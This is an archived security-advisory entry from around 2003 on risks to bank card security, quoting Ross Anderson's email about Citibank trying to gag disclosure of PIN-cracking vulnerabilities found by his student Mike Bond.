COMMAND
	Credit Cards security at risk
SYSTEMS AFFECTED
	n/a
PROBLEM
	 Editor's note
	 =============
	It has been public knowledge for quite some time that the banking  cards
	security are at risk. To summarize :
	-> a French researcher had broken (and been comdemned for that) the  PKI
	bundled with some of those card to emulate copycats known as "Yes card"
	-> some thiefs stoled on repeated accounts  valid  credit  card  numbers
	and account holders details from various online shops, up  to  a  recent
	attack of a  few  millions  account  stolen  from  major  card  delivery
	services
	-> and now the whitepapers below shows  that  motivated  insiders  could
	easily build up scheme to steel millions in cash :
	 http://cryptome.org/pacc.htm
	 http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf
	 http://research.microsoft.com/~aherbert/volume63.pdf 
	Ross Anderson points that in response, a bank tries to get an  order  in
	the   High   Court   today   gagging   public   disclosure   of   crypto
	vulnerabilities :
	
	To: [email protected]
	Subject: Citibank tries to gag crypto bug disclosure
	Date: Thu, 20 Feb 2003 09:57:34 +0000
	From: Ross Anderson <[email protected]>
	Citibank is trying to get an order in the High Court today gagging public 
	disclosure of crypto vulnerabilities:
	  http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_gag.pdf
	I have written to the judge opposing the order:
	  http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_response.pdf
	The background is that my student Mike Bond has discovered some really 
	horrendous vulnerabilities in the cryptographic equipment commonly used 
	to protect the PINs used to identify customers to cash machines:
	  http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf
	These vulnerabilities mean that bank insiders can almost trivially find 
	out the PINs of any or all customers. The discoveries happened while Mike 
	and I were working as expert witnesses on a `phantom withdrawal' case.
	The vulnerabilities are also scientifically interesting:
	  http://cryptome.org/pacc.htm
	For the last couple of years or so there has been a rising tide of phantoms.
	I get emails with increasing frequency from people all over the world whose 
	banks have debited them for ATM withdrawals that they deny making. Banks in
	many countries simply claim that their systems are secure and so the 
	customers must be responsible. It now looks like some of these 
	vulnerabilities have also been discovered by the bad guys. Our courts and 
	regulators should make the banks fix their systems, rather than just lying 
	about security and dumping the costs  on the customers.
	Curiously enough, Citi was also the bank in the case that set US law on 
	phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope that's 
	an omen, if not a precedent ...
	
SOLUTION
	n/a